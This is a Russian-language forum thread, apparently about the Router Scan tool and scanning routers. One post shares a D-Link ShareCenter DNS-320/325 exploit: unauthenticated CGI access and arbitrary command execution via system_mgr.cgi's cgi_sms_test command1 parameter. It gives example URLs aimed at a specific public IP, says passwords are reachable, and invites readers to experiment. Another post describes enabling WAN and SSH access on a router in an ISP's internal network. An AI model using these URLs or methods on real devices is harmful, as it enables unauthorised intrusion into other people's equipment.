Из документации я понял что это серый ip, но какова вероятность что один из соседних роутеров будет в моей подсети и как вообще определить эту подсеть?
старенький, но все еще иногда актуальный эксплойт на D-Link ShareCenter DNS-320, версия прошивки 2.02.0923.2011 DNS-325, версия прошивки 1.01.1217.2010 Spoiler: expliot D-Link ShareCenter devices suffer from a publicly-known authentication bypass issue. In this advisory we shed some light over the impact of this issue. In particular, the device implements almost no authentication checks on HTTP requests for any existing CGI script (i.e., all the CGIs under the /cgi directory). As an example, an attacker may retrieve the device model & firmware version by accessing the following resources: http:/IP/cgi-bin/discovery.cgi http:/IP/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml Besides information gathering, this vulnerability can be exploited to gain full control of the device. In particular, an undocumented functionality permits to execute arbitrary commands, displaying their output in the generated HTML page. As an example, to execute the "ls" command, an attacker can access the following URL: http:/IP/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls Even in this case, no authentication checks are performed. пример Spoiler: example 181.121.64.212/cgi-bin/discovery.cgi 181.121.64.212/cgi-bin/system_mgr.cgi?cmd=get_firm_v_xml 181.121.64.212/cgi-bin/system_mgr.cgi?cmd=cgi_sms_test&command1=ls можно добраться и до логина с паролем. кому интересно - может поиграться и покрутить дальше. п.с. для тех, кому интересны более свежие уязвимости шары, но более сложнее эксплуатируемые (через самба): http://b.fl7.de/2016/08/d-link-nas-dns-xss-via-smb.html
Поддерживаю. А то не всегда удобно проверять на ходу где сейчас сканер. (приходится в ranges.txt лазить, а это не наглядно)
Не думаю, что стандартный компонент позволит так сделать. https://stackoverflow.com/questions/5091018/enable-scroll-bars-in-disabled-tmemo-control Но вот не блокировать его в принципе можно, учитывая что кнопки всё равно заблокированы.
Такой вопрос - есть ip роутера внутренней сети провайдера (10....), nmap нормально сканирует его wan, говорит, что порт 80 открыт, операционная система правильно определяется (т.е. роутер именно этот). При этом невозможно зайти через браузер на страницу ввода пароля админки - какие могут быть варианты? Т.е. это работа фаервола самого роутера, или провайдера, или факт наличия страницы админки на 80 порту lan не означает её наличие на wan? Есть устройства в этой подсети, которые без проблем дают зайти на страницу ввода пароля.
Спасибо, попробую. ps разобрался, нужно просто было в роутере (есть доступ по wlan) включить доступ к wan, заодно ssh включил , красота. Жаль, что сам на другом провайдере, т.е. нет доступа к внутренней городской сети, зашёл через глобальную, но видимо до первой перезагрузки роутера.. ps2 вах, там DDNS халявный от производителя роутера, просто класс .
Что-то мне понадобился ресторатор. Качать было лень, думаю дай посмотрю в Тотал Командоре. Он на скрине. И увидел не только его, но и Ротер скан. Охренел от увиденного Так держать парни, вы уже вошли в классику!
Боян? Нет? А почему тогда дата создания отличается от всех остальных? Искали, говорите, Ресторатор, а в наборе лежит поюзанный Роутерскан, причём вчерашним вечером! Утверждаете, что RS шёл в наборе? Тогда скрин должен соответствовать!
Обьясняю. Полез за ресторатором, так как его не было на панели и увидел роутерскан в наборе программ вшитых в тотал командер. Удивился. Запустил на проверку работоспособности. Работает. Удивился еще сильнее. Порадовался за наших , уважаемых создателей и выложил скрин. Сравните время скрина и время поста. Почти одновременно. Каждый может легко проверить качнув этот Тотал Командер, на скрине указано какая сборка.
Это и так всё понятно было, без объяснений. Ну откуда нам знать, может вы туда RS позже скопировали... Посему, для правдоподобности, нужно прилагать скрин в оригинале, а не "заюзаный". Извиняюсь, что придрался.